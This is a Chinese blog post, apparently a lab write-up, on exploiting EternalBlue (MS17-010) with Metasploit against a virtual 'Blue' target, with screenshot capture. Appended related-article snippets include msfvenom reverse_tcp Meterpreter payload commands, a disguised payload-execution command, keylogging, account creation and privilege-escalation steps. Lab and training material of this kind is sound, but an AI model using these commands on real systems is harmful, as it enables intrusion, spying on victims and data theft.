永恒之蓝漏洞获取桌面截图

最新推荐文章于 2024-09-01 15:00:47 发布
原创 最新推荐文章于 2024-09-01 15:00:47 发布 · 1.6k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

本文介绍了如何使用Metasploit框架进行渗透测试,包括熟悉框架命令、搜索模块、端口扫描,以及利用永恒之蓝漏洞攻击Blue靶机并获取权限。成功攻击后,实现了文件上传和远程截图功能。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

任务

1

2

3

4

熟悉msf框架使用方法,搜索模块,aux探测开放端口等等

安装blue靶机

使用msf框架对blue靶机进行攻击,并获取权限

.利用获取的权限上传任意文件,下载远程屏幕截屏图片

  • 熟悉msf

使用方法:  help  、? 可以获取帮助 , tab 键来补齐命令 ,quit 来退出。

-v 看版本 -q 简洁启动。 返回使用 back  ,exit 进行退出。 

可以使用 nmap 192.168.19.1

搜索模块:search apache type:aux

aux探测开放端口

设置3306,22 端口 ,线程为10

msf6 auxiliary(scanner/portscan/tcp) > run

  • 安装blue 靶机 ,部署靶机到虚拟机,然后登录

192.168.19.129

  • msf框架对blue靶机进行攻击,并获取权限

永恒之蓝漏洞利用

配置IP:set rhosts 192.168.19.129

然后 run , 就完成攻击。

看 ip

看 dir

写个 888 到  /tmp/888.txt

  • 利用获取的权限上传任意文件,下载远程屏幕截屏图片

复现永恒之蓝漏洞(ms17-010)操作配截图
qq_62673514的博客
01-10 321
复现永恒之蓝
Kali--永恒之蓝漏洞复现
f1245179815的博客
10-24 1184
该模块用于发现被漏洞影响的 Windows主机,以及执行命令,可以通过提供的选项进行数据包分析,或可选通道溢出使用,以获得远程命令执行的权限。该模块用于发现被漏洞影响的 Windows主机,以及执行命令,可以通过提供的选项进行数据包分析,或可选通道溢出使用,以获得远程命令执行的权限。该模块用于利用MS17-010漏洞实现远程执行代码,可以覆盖掉目标计算机的内存地址,从而实现攻击者的恶意代码在被攻击计算机上的执行。当目标机开机,程序后台运行,且监听端口为7777,这个端口可以自己设置。
永恒之蓝漏洞利用(MS17-010)获取shell 及获取靶机屏幕截图
沙罗沙罗的博客
05-09 4447
永恒之蓝漏洞利用(MS17-101) 文章目录永恒之蓝漏洞利用(MS17-101)一、永恒之蓝(MS17-101)介绍二、漏洞利用1.检测目标主机是否存在MS17-101漏洞2.使用msf攻击模块执行攻击总结 提示:以下是本篇文章正文内容,下面案例可供参考 一、永恒之蓝(MS17-101)介绍 漏洞名称:“永恒之蓝漏洞 漏洞编号:MS17-010,CVE-2017 0143/0144/0145/0146/0147/0148 漏洞类型:缓冲区溢出漏洞 漏洞影响:信息泄露 CVSS评分:9.3(High)
永恒之蓝 MS17-010
weixin_43726831的博客
11-19 903
WIN7系统永恒之蓝漏洞-打开摄像头、录音、视频监控、截屏 前章: 安全漏洞的分析与利用 PTES渗透测试执行标准 1.简介 永恒之蓝:是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国...
【Metasploit】MSF常用命令
m0_62783065的博客
02-06 2205
【Metasploit】MSF常用命令
msf后渗透之文件交互指令、上传下载文件、屏幕截图、键盘记录、创建账户、音频录像和提权(上)
m0_61506558的博客
09-01 5870
创建之前要是系统权限(getuid查看),要不然会出现[-] Insufficient privileges, account was not be created. 看到这个提示就需要先提权(获取到system)输入 getsystem就好了。获取到meterpreter后 我们在终端内 输入getuid 看实际还没有提权成功 需要在还终端内在输入 getsystem 获取权限。meterpreter中输入:run post/windows/gather/enum_logged_on_users。...
小试一次永恒之蓝漏洞拿到靶机桌面flag
weixin_54921807的博客
05-18 531
小试一次永恒之蓝漏洞拿到靶机桌面flag 搜索网段主机 找到靶机并且使用nmap寻找漏洞 使用msfconsole,进入msf6查找ms17模块的攻击手段 可以先选择辅助模块进行测试,我这里就先用攻击模块进行攻击了 展开所有项进行配置参数,我们能这里只需要配置靶机ip 进行攻击即可,攻击成功后进入cmd页面,改编码(因为win和linux编码不同)然后查找flag所在地址,查看flag内容 谢谢大家! ...
永恒之蓝漏洞复现记录
2301_79155654的博客
09-01 1699
这是一个通信方式。总结来说dministrator是系统内置的管理员用户,一般用户会用到的相关都是以这个权限身份运行的,而System权限是系统本身的权限,只用一些系统进程会具有该权限,正常用户平时并不会接触到。总结来说dministrator是系统内置的管理员用户,一般用户会用到的相关都是以这个权限身份运行的,而System权限是系统本身的权限,只用一些系统进程会具有该权限,正常用户平时并不会接触到。设置payload(指的是在攻击过程中实际执行的代码或命令,这些代码或命令是嵌入在攻击载荷中的。
利用永恒之蓝漏洞渗透win2008并提取主机权限
weixin_65633498的博客
04-10 508
一、漏洞介绍漏洞名称:永恒之蓝漏洞编号:MS17-010漏洞产生的服务:smb----445影响的版本:全系列windows系统漏洞库介绍:MS微软漏洞库,17--2017年,010--第10个漏洞;二、查看漏洞工具:nmap漏洞特征:1.135139445端口开放nmap -sS受害机IP-p端口范围扫描操作系统,如果版本较低,则漏洞存在nmap -O受害机IP三、漏洞利用1、打开metsploit。
基础渗透测试实验—永恒之蓝漏洞复现
G6_12的博客
06-08 4379
ms17-010,永恒之蓝漏洞复现
记一次MSF永恒之蓝入侵win7系统实验
weixin_62297109的博客
12-31 3706
MSF是渗透安全人员非常重要的,必须了解的一个软件,这次实验记录一些msf最基础最简单的用法和命令,希望对大家入门有所帮助
有关永恒之蓝的一些操作
x_13579的博客
02-04 882
在meterpreter 界面输入 run getgui -e 开启目标靶机的远程桌面。打开win7的cmd输入ipconfig,查看一下靶机的IP。
msf命令
qq_52469895的博客
05-19 2591
常用命令总结 execute执行文件 execute #在目标机中执行文件 execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互 execute -H -m -d notepad.exe -f payload.exe -a "-o hack.txt" -d 在目标主机执行时显示的进程名称(用以伪装)-m 直接从内存中执行 "-o hack.txt"是payload.exe的运行参数 migrate进程迁移 getpid # 获取当前进程的p...
kali与永恒之蓝
qq_52820087的博客
10-25 8001
kali永恒之蓝攻击写在前面一、永恒之蓝是何方神圣?二、神马是SMB协议?三、MSF四、攻击步骤1、攻击主机与靶机配置2、攻击步骤五、种植后门 写在前面   这是我的第一篇CSDN博客,最近又参加了一个CTF比赛,当然,纯属兴趣爱好,本人非网络安全专业。写这个呢是为了记录一下去年我第一次在虚拟机上成功实现了永恒之蓝攻击,同时给一个”小朋友“做参考。目前,永恒之蓝漏洞已经销声匿迹了,所以大可不必担心。 一、永恒之蓝是何方神圣?   永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影
kali linux 之复现永恒之蓝(ms17-010)漏洞
weixin_42298807的博客
08-16 5179
一、实验目的 通过永恒之蓝漏洞获取Windows系统的权限 二、实验环境 WMware 虚拟机 Windows 7 64 位 (IP:192.168.148.139) kali linux (192.168.148.128) 三、实验步骤 1、扫描网络中的主机 扫描192.168.148.0网段中存活主机的操作系统类型 发现可以攻击的主机192.168.148.139 2、扫描漏洞 开启met...
MSF命令大全
L_lemo004的博客
10-20 6393
0x00 Payload生成 Windows/Linux Windows: msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f exe > 保存路径/文件名 Linux: msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f elf > 保存路径/文件名 Web PHP: msfvenom -p php/meter
MSF基本使用
浅笑996的博客
11-10 2749
MSF 链接数据库 linux查找文件 find / -name dabase.yml 链接数据库 db_connect -y path/database.yml db_status 查询数据库链接状态 payload: windows/x64/meterpreter/reverse_tcp 命令 (以下命令基于这个payload) background 后台 sessions...
ffmpeg命令 抓屏_如何从Linux中的命令行进行屏幕截图 | MOS86
weixin_30873127的博客
02-06 1138
当谈到屏幕录像(录制桌面视频)时,大多数人会想到一个具有适当用户界面的桌面软件。对于Linux,我们涵盖了几个工具,如Kazam,Screenr和Screentoaster。许多人不知道的是,您也可以通过FFMPEG从命令行进行屏幕截图。它安装FFMPEGFFMPEG在大多数发行版中都有安装它的命令如下:Ubuntusudo apt-get install ffmpegFedorasudo yum...
使用命令行进行截屏!!!
热门推荐
谈笑风声,雨下成林
12-07 1万+
今天我想进行截屏这样伟大而又稀松的任务的时候发现了,我使用不了滑动截屏,坑啊 !!! 我开始在网上怒找截屏工具,但是未果。 但是找到了,命令行截屏这么牛掰的方法,我使用了一下,还是可以的,不错啊,有可以在小伙伴面前装X了 但是在这里还是要总结一下比较好,主要介绍两种截图命令, 工作环境 : ubuntu 12:04.5 截图命令 import 和 scro
metasploit永恒之蓝漏洞远程桌面
最新发布
03-28
### 利用 Metasploit 实现永恒之蓝漏洞远程桌面连接 要通过 Metasploit 框架利用 MS17-010(即“永恒之蓝漏洞)实现远程桌面连接,需按照以下方法操作: #### 1. 配置环境并加载模块 启动 `msfconsole` 并搜索...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值